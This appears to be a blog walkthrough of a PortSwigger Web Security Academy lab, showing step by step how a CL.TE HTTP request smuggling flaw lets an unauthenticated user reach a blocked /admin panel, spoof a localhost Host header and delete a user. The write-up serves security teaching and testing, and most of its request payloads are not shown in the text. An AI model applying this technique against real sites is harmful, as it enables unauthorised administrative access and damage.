HTTP Request Smuggling – Bypassing Frontend Security Controls

This is the next blog post in the series I am publishing dealing with Request Smuggling or Desync vulnerabilities and attacks. These posts align to the PortSwigger Web Security Academy labs (here). The first four posts deal with theory and focus on causing errors with a smuggled request. These errors have included causing abnormal HTTP verbs (GPOST) or causing other errors (400, 405, etc.) in what could be limited DoS attacks. This post is the first that takes and truly shows the potential power of a smuggled payload by allowing an unauthenticated user to exercise administrative function on a site. Very exciting!

This is post #5 of the series. Previous posts here:

    1. CL.TE Vulnerability
    2. TE.CL Vulnerability
    3. TE Header Obfuscation
    4. CL.TE & TE.CL via Differential Responses

Key content/reference material for understanding and exploiting the vulnerability:

For this post, I am going to be focusing on a single lab from the Academy:

Lab: Exploiting HTTP request smuggling to bypass front-end security controls, CL.TE vulnerability

The Goal: delete a user via the admin control panel with a smuggled request. The admin control panel is located on the path ‘/admin’ and the username is carlos. This is the first lab that really demonstrates a tangible impact with a smuggled request. Good stuff!

Once again, we are going to approach the lab as if we do not know we are dealing with a CL.TE vulnerability specifically. The goal is to have repeatable steps that can be used in testing outside of the Web Security academy in your own bug bounty and security research efforts.

Step 1: Open the lab within the Burp provided preconfigured browser and browse to ‘/admin’. You’ll receive a 403 Forbidden response with the message:

"Path /admin is blocked"

Since we are not an admin, this makes sense. There’s a defense in place that ensures the admin interface can only be accessed either with appropriate credentials or from an appropriate location.

Step 2: Just as in previous posts, we need to find a request that is vulnerable to a smuggling attack. With the browser, send a request to ‘/’  and then grab the request from the HTTP history log within Burp and send to Repeater. Flip the GET to a POST. Include a body within the request and then send.

This works, so, we have potentially identified a soft spot to attack.

Step 3: Add in the Transfer-Encoding header. If we leave the payload within the body as is, it does not conform to expectations if TE is honored by the web application (either frontend or backend).

This hangs with a 500 error, so, either the frontend or the backend is probably honoring TE.

Step 4: Update the payload to conform to Transfer-Encoding spec. At this point, just let Burp update the Content-Length (top menu Repeater –> Update Content-Length) header for ease. This will prove that the web application is handling the Transfer-Encoding header correctly.

This works. Now, we need to see if we can get the application to break and/or respond in a way that indicates that we do in fact have a request smuggling vulnerability on this route within the web application.

Step 5: We need to determine if a mismatch between Content-Length and Transfer-Encoding causes the web application to respond with an error or hang. If the web application (all components that handle the request) responds per HTTP specification, Content-Length should get ignored and the request should always be handled per the Transfer-Encoding header. In order to test, set the Content-Length to 1 shorter than the actual payload length and send the request. Make sure and turn off Repeater –> Update Content-Length from the top level menu.

With the Content-Length set to 1 character shorter than expected, the request hangs for 10 seconds and then returns a 500 error with an XML payload. Let’s try with 1 character longer.

This hangs and returns a 500 with a text error and consistently takes 15 seconds to return. We have 2 very different (and reproduceable) timeout conditions. Not only that, but post waiting for the 500 to return (either 10 or 15 seconds depending), we get 2 different error payloads. Here’s my take on this behavior…

When the Content-Length is set to 23, the the frontend is going to take the following payload and submit it to the backend:


If the backend honors the Transfer-Encoding header, the payload will be a character short (the final ‘\n’ to complete the CRLF) which will cause it to hang. In this case, it hangs 10 seconds before it returns a 500 with the XML payload.

When the Content-Length is set to 25 (or higher), the frontend itself is waiting for additional input (it is a character short) before passing the payload to the backend. This causes a 15 second wait, the 500 error and a text based payload.

Given this behavior, it would seem the frontend is not conforming to spec – it is honoring Content-Length despite Transfer-Encoding being present. This is definitely a good spot to try to smuggle a request!

Step 6: Since the frontend is honoring Content-Length, might as well let Repeater control the top level Content-Length header. Re-enable with Repeater –> Update Content-Length. Once this is done, let’s try sending through trailing content. If this works, the extra content will be queued on the backend and released on a second request.

Eureka! Notice we did not get a 403 Forbidden error as we did in step 1 when trying to access the /admin control panel. Instead, we must have submitted a malformed request. This makes sense. If we queued the trailing content (GET /admin HTTP/1.1) then the second request to go through the backend would look like this:

GET /admin HTTP/1.1POST / HTTP/1.1
Host: <lab>

This obviously would not work.

Step 7: We need to handle the top line of the second request by pushing it to the next line and appending to a header that will be ignored by the backend. Enter the ‘Foo’.

There we go! We are now getting the expected error when we try to access the /admin page. Scrolling down and looking at the text from the returned error:

This is interesting. When an interface is only available to local users, that often means that it has to be accessed from http(s)://localhost, http(s):// or some other method of specifying local access.

Step 8: Let’s try and trick it! If we specify the host within our smuggled payload, it is possible the backend will honor our host header and ignore the one getting concatenated from the second request.

Nope. In fact, it has a specific defense – duplicate headers are not allowed.

Step 9: We have no way to truly control the headers of the second request – it is what it is. Therefore, the only way to negate a duplicate header is to get it out of the head of the request and move it to the body. That means we have to construct the full request we want to send the /admin path and append the head of the second request into the body.

This pushes all of the headers from the second request (including the duplicate host header) into the body. Notice we have to pay special attention to the Content-Length specified within our smuggled request payload. If this is too short, the backend will simply process the request and it will fall away. By setting the Content-Length to at least 1 character longer, we cause queueing and cause the /admin control panel to be sent client side. This is great! Now, we see the path to delete carlos.

Step 10: Let’s delete carlos. All we have to do is update the path in the smuggled request to the one returned in previous step.


Done! In this case, defense of the /admin portal is being handled by the frontend. The frontend is disallowing any request to the /admin path on the backend unless it originates from localhost. By specifying localhost within the host header of a smuggled request, we were able to bypass a basic defense to prevent a non admin user from executing administrative functionality on the site.

Lessons learned:

  • Keep it simple – always test trailing content before moving on to more complex playloads
  • Pay special attention to the Content-Length within the smuggled payload
  • When a second request causes duplicate header errors, move the headers of the second request to the body

Happy hunting!

Leave a Reply